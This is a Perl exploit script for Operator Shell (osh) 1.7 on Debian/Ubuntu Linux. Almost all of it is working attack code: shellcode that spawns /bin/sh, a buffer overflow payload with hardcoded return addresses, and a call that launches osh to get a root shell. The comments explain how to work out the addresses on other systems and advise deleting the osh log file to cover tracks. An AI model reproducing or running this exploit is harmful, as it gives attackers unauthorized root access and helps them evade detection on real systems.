#!/usr/bin/perl ################################################### # # OSH 1.7 Exploit # # EDUCATIONAL purposes only.... :-) # # by Charles Stevenson (core) # # Don't forget to clean /var/log/osh.log # ################################################### # PRIVATE - DO NOT DISTRIBUTE - PRIVATE # ################################################### ################################################### # NOTES: ################################################### # Here's how to get the addresses in case it doesn't work on your box: # sh-3.00$ xxd /usr/sbin/osh | grep exit | grep -v _exit # 0005080: 6578 6974 006c 6f67 6f75 7400 7465 7374 exit.logout.test # # sh-3.00$ osh more /proc/self/maps | grep osh # 08048000-0804e000 r-xp 00000000 03:01 176445 /usr/sbin/osh # ^--- add this together with 0x5080 to get the address of "exit" # # sh-3.00$ python -c "print hex(0x08048000 + 0x5080)" # 0x804d080 ################################################### # "Osh is known to compile on: SunOS 4.1.3, Solaris 2.x, Unicos 6.x & 7.x # (XMP and YMP), and VAX Ultrix 4.2, SGI IRIX, HP/UX, and AIX 3.2.5." # # So send me patches and rets if you have these systems ;-) $exit_addy = pack("l", #0x0804d39c # Ubuntu Linux # - osh_1.7-12_i386.deb 0x0804d080 # Debian Linux stable/testing/unstable # - osh_1.7-11woody1_i386.deb # - osh_1.7-12_i386.deb ); # Yanked from one of KF's exploits.. werd brotha ;-) I'm lazy.. $sc = "\x90" x (511-45) . # 45 bytes by anthema. 0xff less "\x89\xe6" . # /* movl %esp, %esi */ "\x83\xc6\x30" . # /* addl $0x30, %esi */ "\xb8\x2e\x62\x69\x6e" . # /bin /* movl $0x6e69622e, %eax */ "\x40" . # /* incl %eax */ "\x89\x06" . # /* movl %eax, (%esi) */ "\xb8\x2e\x73\x68\x21" . # /sh /* movl $0x2168732e, %eax */ "\x40" . # /* incl %eax */ "\x89\x46\x04" . # /* movl %eax, 0x04(%esi) */ "\x29\xc0" . # /* subl %eax, %eax */ "\x88\x46\x07" . # /* movb %al, 0x07(%esi) */ "\x89\x76\x08" . # /* movl %esi, 0x08(%esi) */ "\x89\x46\x0c" . # /* movl %eax, 0x0c(%esi) */ "\xb0\x0b" . # /* movb $0x0b, %al */ "\x87\xf3" . # /* xchgl %esi, %ebx */ "\x8d\x4b\x08" . # /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" . # /* leal 0x0c(%ebx), %edx */ "\xcd\x80"; # /* int $0x80 */ print "\n\nOperator Shell (osh) 1.7-12 root exploit\n"; print "----------------------------------------------\n"; print "Written by Charles Stevenson \n\n"; # Clear out the environment. foreach $key (keys %ENV) { delete $ENV{$key}; } # Setup simple env so ret is easier to guess $ENV{"HELLCODE"} = "$sc"; $ENV{"TERM"} = "linux"; $ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin"; # Create the payload... $egg = "&"x1019 . # pad up to NUMENTRY pack("l",0x01d5c001) . # overwrite with a positive int "&"x20 . # ampersand gets pas TTOOLONG pack("l",0xffffffff) . # AliasCounter = -1 skips for loop "core" . # shameless self-promotion $exit_addy . # address of "exit" pack("l",0xbffffe30) . # address of shellcode in ENV $exit_addy; # address of a NULL terminated string system("/usr/sbin/osh exit '$egg'"); # EOF